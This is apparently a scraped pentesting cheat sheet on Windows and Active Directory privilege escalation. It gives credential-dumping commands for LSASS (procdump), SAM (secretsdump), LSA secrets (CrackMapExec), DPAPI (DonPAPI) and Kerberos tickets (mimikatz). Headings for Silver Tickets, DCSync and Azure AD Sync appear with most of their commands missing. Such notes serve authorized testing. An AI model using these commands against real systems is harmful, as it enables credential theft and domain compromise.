Administrator account

Extract credentials from LSASS

procdump.exe --acepteula -ma lsass.exe lsass.dmp

Extract Credentials from SAM

secretsdump.py <domain>/<user>:<password>@<ip>

Extract Credentials from LSA

cme smb <ip-range> -u <user> -p <password> --lsa

Extract dpapi

DonPAPI.py <domain>/<user>:<password>@<target>

Extract kerberos tickets

sekurlsa::tickets

Silver Tickets

Prerequisites

  • SPN password hash

  • Domain SID

  • Target SPN

Silver Ticket Forgery

NTLM Hash

We have to load mimikatz and extract the NTLM hash:

Domain SID

Then to obtain the SID use whoami:

Ticket Forging

With that information we can forge the ticket:

Using the ticket

DCSync

Search Password Files

Search Stored Password

Chrome

Token Manipulation

Account Operators Group Membership

Add User

Import PowerView

Add DCSync Rights

DCSync

Azure Admin Group Membership

If an user is Admin of Azure Group we can try to exploit Azure AD Sync to grab the administrator password:

Then run this command being inside the path C:\Program Files\Microsoft Azure AD Sync\Bin :

Last updated